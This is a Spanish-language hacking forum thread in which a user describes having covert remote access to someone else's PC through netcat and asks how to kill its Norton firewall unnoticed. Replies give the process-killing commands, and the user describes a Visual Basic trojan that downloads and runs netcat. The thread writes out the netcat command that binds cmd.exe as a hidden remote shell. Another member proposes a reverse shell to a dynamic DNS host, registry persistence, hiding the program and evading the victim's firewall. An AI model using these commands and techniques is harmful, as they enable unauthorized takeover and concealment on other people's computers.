elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.
 
Inicio Ayuda Buscar Ingresar Registrarse
27 Mayo 2012, 22:00  


Tema destacado: [AIO elhacker.NET] Compilación herramientas análisis y desinfección malware

+  Foro de elhacker.net
|-+  Seguridad Informática
| |-+  Hacking Avanzado
| | |-+  Hacking Básico (Moderadores: zhyzura, kamsky, TRICKY)
| | | |-+  Matar procesos desde msdos
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] Ir Abajo Respuesta Imprimir
Autor Tema: Matar procesos desde msdos  (Leído 48,008 veces)
Karmeshin

Desconectado Desconectado

Mensajes: 51



Ver Perfil
Matar procesos desde msdos
« en: 15 Septiembre 2003, 07:04 »

Buenas, tengo acceso a un pc mediante telnet.... (gracias netcat xD). Tiene el RAdmin puesto y e podido ver q cuando me conecto a su pc el firewall del "Norton" le parpadea el icono del tray. Desde telnet como podria matar dicho proceso? Tengo todos los priviliejios. Thx
En línea
eltio

Desconectado Desconectado

Mensajes: 23


¡Amo YaBB SE!


Ver Perfil
OK
« Respuesta #1 en: 15 Septiembre 2003, 08:38 »

hola tio, yo no te voy a responder por que de verdad no se lo que estas preguntando, pero queria preguntarte como hicistes para entrar en esa pc a traves de netcat, lo que pasa es que tengo como dos meses tratando de hacer una pequeña conexión en una lan a traves de netcat y siempre me da error, queria saber si no tienes problemas en explicarme paso por paso como  hicistes para hacer eso si no es mucha molestia..

chao y suerte
gracias
En línea
mdada

Desconectado Desconectado

Mensajes: 183


f


Ver Perfil
Re:Matar procesos desde msdos
« Respuesta #2 en: 15 Septiembre 2003, 11:58 »

Bueno si la PC es un Windows XP
puedes hacer lo siguiente desde tu consola teclea:
tasklist
y te saldra la lista de los procesos y su Pid
luego
pon:
taskkill /PID akinumero /F  
[enter]
y eliminas el proceso
o:
taskkill /F /IM nombreexe.exe
[enter]

y eliminas el proceso
si es un win2k  y lo que kieres detener es un servicio
es con el net stop "nombre de servicio"
en win2k taskkill no sé si exista,creo que no.. jeje
En línea
Karmeshin

Desconectado Desconectado

Mensajes: 51



Ver Perfil
Re:Matar procesos desde msdos
« Respuesta #3 en: 15 Septiembre 2003, 15:07 »

1º- Gracias MDark, era eso lo q buscaba.

2º- eltio, lo que e echo a sido hacer un programa en Visual Basic, dicho programa ocupa unos 40 Kb y se encarga de lo siguiente: De manera automatica, se baja el netcat de internet y lo ejecuta haciendo q kien se conecte a el, le ejecute cmd.exe (la consola). (Este programa digamos q funcionaria como troyano).
Creo que me pides cual seria el comando para tener shell en el pc remoto...... seria lo siguiente:
PCRemoto: ejecutas lo siguiente: nc -v -L -p 6969 -d -e cmd.exe
Si ejecutas eso (Cambias el 6969 por un puerto de su gusto) ejecutaras de manera "oculta" el netcat. Ahora vas a, digamos, tu pc. Escribes: nc -vv -t IPRemota 6969
y te conectaras al PC donde hayas ejecutado la 1º linea obteniendo shell. Pero eso es cuestion de lo que se kiera hacer ;) xD. No hace falta q diga q tal cual lo he explicado solo sirve para dentro de una Red Local o por internet pero sin usar NAT, vamos, con los puertos abiertos. Si se tiene firewall, configurarlo para aceptar entradas por ese puerto y tal.
En línea
mdada

Desconectado Desconectado

Mensajes: 183


f


Ver Perfil
Re:Matar procesos desde msdos
« Respuesta #4 en: 15 Septiembre 2003, 17:02 »

Oye eltio por que no mejor te buscas en www.google.com textos sobre el uso del netcat, protoclo TPC/IP etc..
no crees?
cosas tan fáciles de entender y aprender que creo que puedes tomarte aunque sea unos 5 min de busqueda y no solo preguntar..
que de eso se trata, mas bien ese es el chiste...
salu!
En línea
Aironjack


Desconectado Desconectado

Mensajes: 661


[b]Las preguntas sobre wireless en el foro[/b]


Ver Perfil
Re: Matar procesos desde msdos
« Respuesta #5 en: 23 Marzo 2005, 06:01 »

Si lo que queremos es acabar con procesos que pueden poner en peligro nuestra identidad en la intrusión y ser detectados o bien se nos cierre esa entrada que hemos logrado.

Desarmando el firewall ---> http://foro.elhacker.net/index.php/topic,58485.0.html

Me interesaría si es posible Karmeshin que postearas el código del programa que has hecho en VB para estudiarlo. Te posteo a continuación algunas ideas para implementarlo.

1.- Puedes hacer una reverse shell a un DNS estático de no-ip.org Aunque esto implicaría que dejarás en tu ordenador el netcat siempre escuchando y que el programa comprobase cuando la "víctima" está conectada para hacer el intento de reverse shell con netcat.

Tendrías que poner tu programa en el registro (para que arranque con windows), esconderlo y llamar al netcat cuando la "víctima" se conectase a internet, y estar tú también conectado obviamente. Pero de este modo tu programa sería funcional para saltarse redes LAN.

2.- Sobre los problemas del firewall y los puertos habilitados, por no llamar la atención (deshabilitando el firewall o cargándote el proceso) podrías usar un control para el manejo del SP en windows. Sobre como funca el control no te puedo informar, pero supongo que se podría utilizar para eso, habilitar el puerto por el que vas a correr netcat.

Por cierto los AVs y los firewalls son utilidades más que necesarias sin las cuales muchos aquí no se conectarían a internet por miedo a intrusiones. Yo soy muy amigo de mi Panda por si lo quieren saber y si el Norton es gay o no, no tengo ni idea. Pero me gusta que mi máquina funcione bien.

Espero que te sirvan de algo estas ideas. 
Un saludo
En línea

***** Ortografía = Cultura ***** Escriban bien por favor.
Un router no es un juguete. Robar internet es ilegal y puede ser castigado con la cárcel. Ser menor de edad, no significa ser inconsciente mental.
Páginas: [1] Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
twitter desde msdos?
Scripting
morenochico 5 646 Último mensaje 11 Noviembre 2011, 19:46
por RyogiShiki
Powered by SMF 1.1.16 | SMF © 2006-2008, Simple Machines